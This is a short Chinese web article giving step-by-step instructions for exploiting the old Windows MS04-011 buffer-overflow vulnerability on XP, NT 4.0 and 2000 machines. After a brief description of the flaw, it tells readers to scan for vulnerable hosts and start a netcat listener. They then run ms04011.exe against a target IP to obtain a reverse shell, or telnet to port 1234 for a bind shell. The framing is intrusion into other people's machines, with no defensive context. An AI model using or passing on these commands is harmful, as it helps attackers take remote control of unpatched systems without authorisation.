经典漏洞ms04011的必杀技
发布时间:2016-12-26 来源:查字典编辑
摘要:受影响系统:MicrosoftWindowsXPMicrosoftWindowsNT4.0MicrosoftWindows2000描述:Mi...
受影响系统:
MicrosoftWindowsXP
MicrosoftWindowsNT4.0
MicrosoftWindows2000
描述:
MicrosoftWindowsWinlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
1用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大
2扫到后用NC来监听nc-l-p监听端口-----按回车或nc-vv-l-p监听端口
3方式ms04011.exe0要入侵的IP监听端口自己IP
其中0表示2000系统NT5.01表示XP系统NT5.1
或者----------------------------------------------
先ms04011.exe0要入侵的IP
然后直接telnet要入侵的IP1234。